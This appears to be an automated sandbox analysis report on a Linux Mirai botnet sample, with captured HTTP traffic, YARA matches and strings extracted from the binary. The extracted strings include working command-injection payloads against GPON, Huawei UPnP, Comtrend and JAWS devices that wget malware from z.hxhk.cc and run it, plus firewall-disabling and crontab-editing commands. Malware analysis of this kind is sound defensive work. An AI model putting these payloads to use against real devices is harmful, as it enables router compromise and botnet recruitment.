Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Mon, 18 Mar 2024 09:00:14 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:00:21 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 09:00:22 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 09:00:22 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 39 3a 30 30 3a 32 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 6b 73 61 6e 64 72 61 6e 75 66 72 69 65 76 2e 66 76 64 73 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 09:00:22 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 317Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:00:21 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 12:00:21 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 12:00:22 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 09:00:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:59 GMTServer: Apache/2.2.16 (Win32) SVN/1.6.6 mod_ssl/2.2.16 OpenSSL/0.9.8x PHP/5.3.17 DAV/2Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 49 74 20 77 6f 72 6b 73 21 3c 2f 68 31 3e 0d 0a 35 2e 33 2e 31 37 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 43 61 6c 6c 20 74 6f 20 75 6e 64 65 66 69 6e 65 64 20 66 75 6e 63 74 69 6f 6e 20 63 75 72 6c 5f 69 6e 69 74 28 29 20 69 6e 20 3c 62 3e 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 41 70 61 63 68 65 32 2e 32 5c 68 74 64 6f 63 73 5c 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 36 3c 2f 62 3e 3c 62 72 20 2f 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html><html><body><h1>It works!</h1>5.3.17<br /><b>Fatal error</b>: Call to undefined function curl_init() in <b>C:\Program Files (x86)\Apache2.2\htdocs\index.php</b> on line <b>6</b><br />
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 12:00:22 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 12:00:23 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:59 GMTServer: Apache/2.2.16 (Win32) SVN/1.6.6 mod_ssl/2.2.16 OpenSSL/0.9.8x PHP/5.3.17 DAV/2Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 49 74 20 77 6f 72 6b 73 21 3c 2f 68 31 3e 0d 0a 35 2e 33 2e 31 37 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 43 61 6c 6c 20 74 6f 20 75 6e 64 65 66 69 6e 65 64 20 66 75 6e 63 74 69 6f 6e 20 63 75 72 6c 5f 69 6e 69 74 28 29 20 69 6e 20 3c 62 3e 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 41 70 61 63 68 65 32 2e 32 5c 68 74 64 6f 63 73 5c 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 36 3c 2f 62 3e 3c 62 72 20 2f 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html><html><body><h1>It works!</h1>5.3.17<br /><b>Fatal error</b>: Call to undefined function curl_init() in <b>C:\Program Files (x86)\Apache2.2\htdocs\index.php</b> on line <b>6</b><br />
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:59 GMTServer: Apache/2.2.16 (Win32) SVN/1.6.6 mod_ssl/2.2.16 OpenSSL/0.9.8x PHP/5.3.17 DAV/2Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 49 74 20 77 6f 72 6b 73 21 3c 2f 68 31 3e 0d 0a 35 2e 33 2e 31 37 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 43 61 6c 6c 20 74 6f 20 75 6e 64 65 66 69 6e 65 64 20 66 75 6e 63 74 69 6f 6e 20 63 75 72 6c 5f 69 6e 69 74 28 29 20 69 6e 20 3c 62 3e 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 41 70 61 63 68 65 32 2e 32 5c 68 74 64 6f 63 73 5c 69 6e 64 65 78 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 36 3c 2f 62 3e 3c 62 72 20 2f 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html><html><body><h1>It works!</h1>5.3.17<br /><b>Fatal error</b>: Call to undefined function curl_init() in <b>C:\Program Files (x86)\Apache2.2\htdocs\index.php</b> on line <b>6</b><br />
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 18 Mar 2024 09:00:25 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Boa/0.94.13Date: Mon, 18 Mar 2024 09:01:24 GMTContent-Type: text/htmlContent-Length: 126Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Mar 2024 09:00:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0

Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/adb;
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20jno%27/&sessionKey=1039230114
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/gpon443
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/sys64.arm7;chmod
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/sys64.mips
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/sys64.mips;
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/sys64.mpsl;chmod
Source: 4lXTg8P7Ih.elf	String found in binary or memory: http://z.hxhk.cc/sys64.x86

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 4lXTg8P7Ih.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 4lXTg8P7Ih.elf, type: SAMPLE	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 4lXTg8P7Ih.elf, type: SAMPLE	Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+80`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+80`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0POST /HNAP1/ HTTP/1.0

Source: Initial sample	Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://z.hxhk.cc/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1
Source: Initial sample	Potential command found: sed -i '/\/lib\/system-mark/d' /etc/init.d/cron >/dev/null 2>&1
Source: Initial sample	Potential command found: sed -i "/^$SEARCH_LINE/d" /etc/crontab >/dev/null 2>&1
Source: Initial sample	Potential command found: ufw disable >/dev/null 2>&1
Source: Initial sample	Potential command found: GET /index.php?s=/index/hink

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	SIGKILL sent: pid: 936, result: successful			Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	SIGKILL sent: pid: 6483, result: unknown			Jump to behavior

Source: 4lXTg8P7Ih.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 4lXTg8P7Ih.elf, type: SAMPLE	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 4lXTg8P7Ih.elf, type: SAMPLE	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
